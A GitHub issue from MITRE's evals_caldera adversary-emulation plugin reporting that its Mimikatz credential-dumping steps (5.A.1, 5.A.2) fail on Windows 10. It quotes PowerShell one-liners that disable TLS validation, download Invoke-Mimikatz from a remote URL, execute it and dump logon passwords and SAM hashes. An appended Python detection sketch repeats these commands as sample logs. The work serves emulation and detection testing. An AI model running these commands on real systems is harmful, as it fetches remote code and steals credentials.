mitre-attack / evals_caldera

A CALDERA plugin for ATT&CK Evaluations Round 1

[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update

Cyb3rWard0g opened this issue · comments

Good evening team,

This issue goes along with:

because they are from the same setup and operation execution (APT3 - Full)

When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) , Mimikatz failed to run.

Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to DEV branch and it worked properly with Win10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and Servers are Win 2019. They are all configured to the setup standards from the evals.

I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38

I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:

I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.

Thank you in advance!
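As an added example (editor's addition, not code from this issue or from the evals_caldera project): a small Python detection sketch that scans PowerShell script-block text for the indicators present in the two ability commands quoted above, so the emulation steps can be checked against a defender's logging even when the loader itself fails. The rule names, severity levels and the log records are constructed here; the first two records are the 5.A.1 and 5.A.2 commands from the issue, the other two are made up for contrast, and no real logging API is assumed.

```python
"""Detection sketch for the credential-dumping commands quoted in this issue.

Scans script-block style text (what Event ID 4104 ScriptBlockText would carry)
for: certificate-validation bypass, a DownloadString + iex cradle, the
Invoke-Mimikatz loader name, and the Mimikatz module commands for T1003.
"""
import re
from typing import Dict, List

# Each rule lists one or more regexes that must ALL match for the rule to fire,
# so the download cradle only fires when both the fetch and the execution half
# are present. Rule names are constructed for this example.
RULES: Dict[str, List[re.Pattern]] = {
    # Certificate validation disabled before the payload is fetched.
    "tls_validation_disabled": [
        re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    ],
    # WebClient.DownloadString whose result is handed to iex / Invoke-Expression.
    "download_cradle": [
        re.compile(r"\bDownloadString\s*\(", re.I),
        re.compile(r"(^|[\s;(])(iex|Invoke-Expression)\b", re.I),
    ],
    # Loader function name used by the evaluation abilities.
    "invoke_mimikatz": [re.compile(r"\bInvoke-Mimikatz\b", re.I)],
    # Module commands seen in steps 5.A.1 and 5.A.2 (T1003 credential dumping).
    "mimikatz_modules": [
        re.compile(r"\b(sekurlsa::logonpasswords|lsadump::sam|privilege::debug|token::elevate)\b", re.I),
    ],
}

# Constructed sample records standing in for script-block log entries.
# Records 1 and 2 are the ability commands quoted in the issue; 3 and 4 are made up.
SAMPLE_LOG = [
    {"id": 1, "host": "WKS01", "text": (
        '[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };'
        '$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.'
        'githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/'
        'Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command '
        '"privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;')},
    {"id": 2, "host": "WKS01", "text": (
        '[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };'
        '$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.'
        'githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/'
        'Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command '
        '"privilege::debug token::elevate lsadump::sam exit"};hashdump;')},
    # Constructed: a bare download cradle with no Mimikatz content.
    {"id": 3, "host": "SRV01", "text":
        "$w = New-Object Net.WebClient; iex $w.DownloadString('https://example.invalid/update.ps1')"},
    # Constructed: benign administrative one-liner.
    {"id": 4, "host": "SRV01", "text":
        "Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id"},
]


def scan_script_block(text: str) -> List[str]:
    """Return the names of every rule whose patterns all match the script block."""
    return [name for name, pats in RULES.items() if all(p.search(text) for p in pats)]


def severity(hits: List[str]) -> str:
    """Rank a record: credential-dumping indicators outrank a bare download cradle."""
    if "mimikatz_modules" in hits or "invoke_mimikatz" in hits:
        return "high"
    if "download_cradle" in hits or "tls_validation_disabled" in hits:
        return "medium"
    return "none"


def scan_log(records) -> List[dict]:
    """Run every rule over each record and keep only records with at least one hit."""
    findings = []
    for rec in records:
        hits = scan_script_block(rec["text"])
        if hits:
            findings.append({"id": rec["id"], "host": rec["host"],
                             "severity": severity(hits), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']:6}] record {f['id']} on {f['host']}: {', '.join(f['hits'])}")
```

Because the rules key on the module command strings and the loader name rather than on the remote URL, the same scan still flags the commands after the script is rehosted, as the later comment in this thread does when it points at a different Invoke-Mimikatz.ps1 location.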

This was updated with the latest Mimikatz release: https://raw.githubusercontent.com/hunters-forge/Blacksmith/master/aws/mordor/cfn-files/scripts/Invoke-Mimikatz.ps1

UPDATED $PEBytes64 strings - 2.2.0-20190813 Release - Updated 10/20/2019